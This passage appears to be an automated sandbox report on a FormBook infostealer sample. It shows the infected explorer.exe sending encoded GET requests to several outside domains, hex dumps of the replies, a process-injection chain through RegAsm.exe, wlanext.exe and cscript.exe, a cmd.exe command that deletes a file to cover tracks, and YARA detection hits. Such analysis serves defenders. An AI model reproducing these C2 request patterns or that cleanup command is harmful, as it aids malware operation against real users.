53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      6192.168.2.349743192.64.147.16480C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 20, 2020 20:14:57.519289970 CET4671OUTGET /o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF HTTP/1.1
                                                                      Host: www.sabaicraft.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Nov 20, 2020 20:14:57.684051991 CET4672INHTTP/1.1 404 Not Found
                                                                      Date: Fri, 20 Nov 2020 19:14:57 GMT
                                                                      Server: Apache/2.2.3 (CentOS)
                                                                      X-Powered-By: PHP/5.3.8
                                                                      Set-Cookie: session=321b2d73e8965a770dd31776b723b317; expires=Fri, 20-Nov-2020 19:44:57 GMT; path=/
                                                                      Vary: Accept-Encoding,User-Agent
                                                                      P3P: CP="CAO PSA OUR"
                                                                      Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
                                                                      Pragma: no-cache
                                                                      Expires: Mon, 31 Dec 2001 7:32:00 GMT
                                                                      Content-Length: 844
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Data Raw: 3c 68 74 6d 6c 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 52 45 43 2d 68 74 6d 6c 34 30 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 73 61 62 61 69 63 72 61 66 74 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 76 61 6c 75 65 3d 22 22 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 09 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 38 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 20 20 20 20 24 28 27 23 6d 61 69 6e 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 22 2f 63 66 2e 70 68 70 22 29 3b 0a 09 09 20 20 20 20 24 28 27 23 6d 61 69 6e 27 29 2e 63 73 73 28 27 76 69 73 69 62 69 6c 69 74 79 27 2c 20 27 76 69 73 69 62 6c 65 27 29 3b 0a 09 09 7d 29 3b 0a 0a 09 09 2f 2a 20 69 66 20 28 70 61 72 65 6e 74 2e 66 72 61 6d 65 73 2e 6c 65 6e 67 74 68 20 3e 20 30 29 0a 09 09 20 20 20 20 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 29 3b 20 2a 2f 0a 09 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 6e 6f 22 20 62 6f 72 64 65 72 3d 22 30 22 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 20 69 64 3d 22 66 72 61 6d 65 73 65 74 22 3e 0a 09 3c 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 22 20 73 72 63 3d 22 2f 63 66 2e 70 68 70 22 3e 3c 2f 66 72 61 6d 65 3e 0a 09 3c 66 72 61 6d 65 20 69 64 3d 22 73 75 62 31 22 20 73 72 63 3d 22 62 68 2e 70 68 70 3f 64 6d 3d 73 61 62 61 69 63 72 61 66 74 2e 63 6f 6d 26 6b 77 3d 26 74 74 3d 33 32 31 62 32 64 37 33 65 38 39 36 35 61 37 37 30 64 64 33 31 37 37 36 62 37 32 33 62 33 31 37 26 74 79 3d 66 61 6c 73 65 22 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 22 3e 3c 2f 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <html xmlns="http://www.w3.org/TR/REC-html40"> <head><title>sabaicraft.com</title><meta name="keywords" value=""/><meta name="description" content=""> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script> <script type="text/javascript">$(document).ready(function () { $('#main').attr('src', "/cf.php"); $('#main').css('visibility', 'visible');});/* if (parent.frames.length > 0) top.location.replace(document.location); */ </script> </head> <frameset rows="100%,*" frameborder="no" border="0" framespacing="0" id="frameset"><frame id="main" src="/cf.php"></frame><frame id="sub1" src="bh.php?dm=sabaicraft.com&kw=&tt=321b2d73e8965a770dd31776b723b317&ty=false" style="visibility: hidden;"></frame> </frameset></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      7192.168.2.34974435.186.238.10180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 20, 2020 20:15:02.776315928 CET4673OUTGET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=6yhb1plVNlXQq+RzpSC3aP+nXZqT+h1u1iqVXpUKlvKLd7IxuSoQjy9XoIojNuJhzNIO HTTP/1.1
                                                                      Host: www.deadroommn.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Nov 20, 2020 20:15:02.891478062 CET4674INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Fri, 20 Nov 2020 19:15:02 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "5fb6dfee-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      8192.168.2.34974534.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 20, 2020 20:15:13.044230938 CET4675OUTGET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw HTTP/1.1
                                                                      Host: www.keitakora.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Nov 20, 2020 20:15:13.160152912 CET4675INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Fri, 20 Nov 2020 19:15:13 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "5fb7c4ff-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      Analysis Process: NQQWym075C.exe PID: 5264 Parent PID: 5704

                                                                      General

                                                                      Start time:20:13:00
                                                                      Start date:20/11/2020
                                                                      Path:C:\Users\user\Desktop\NQQWym075C.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\NQQWym075C.exe'
                                                                      Imagebase:0xed0000
                                                                      File size:552960 bytes
                                                                      MD5 hash:BF75ED61E1B1F7B310EC1D999077C4DD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Analysis Process: RegAsm.exe PID: 5368 Parent PID: 5264

                                                                      General

                                                                      Start time:20:13:05
                                                                      Start date:20/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Imagebase:0xd80000
                                                                      File size:64616 bytes
                                                                      MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      Analysis Process: explorer.exe PID: 3388 Parent PID: 5368

                                                                      General

                                                                      Start time:20:13:07
                                                                      Start date:20/11/2020
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff714890000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: NQQWym075C.exe PID: 1744 Parent PID: 5264

                                                                      General

                                                                      Start time:20:13:08
                                                                      Start date:20/11/2020
                                                                      Path:C:\Users\user\Desktop\NQQWym075C.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\NQQWym075C.exe'
                                                                      Imagebase:0xaf0000
                                                                      File size:552960 bytes
                                                                      MD5 hash:BF75ED61E1B1F7B310EC1D999077C4DD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Analysis Process: RegAsm.exe PID: 5776 Parent PID: 1744

                                                                      General

                                                                      Start time:20:13:16
                                                                      Start date:20/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Imagebase:0xd40000
                                                                      File size:64616 bytes
                                                                      MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      Analysis Process: wlanext.exe PID: 1844 Parent PID: 3388

                                                                      General

                                                                      Start time:20:13:19
                                                                      Start date:20/11/2020
                                                                      Path:C:\Windows\SysWOW64\wlanext.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                      Imagebase:0xb80000
                                                                      File size:78848 bytes
                                                                      MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      Analysis Process: cmd.exe PID: 808 Parent PID: 1844

                                                                      General

                                                                      Start time:20:13:23
                                                                      Start date:20/11/2020
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
                                                                      Imagebase:0xbd0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: conhost.exe PID: 5232 Parent PID: 808

                                                                      General

                                                                      Start time:20:13:24
                                                                      Start date:20/11/2020
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6b2800000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: cscript.exe PID: 6064 Parent PID: 3388

                                                                      General

                                                                      Start time:20:13:24
                                                                      Start date:20/11/2020
                                                                      Path:C:\Windows\SysWOW64\cscript.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                      Imagebase:0x100000
                                                                      File size:143360 bytes
                                                                      MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >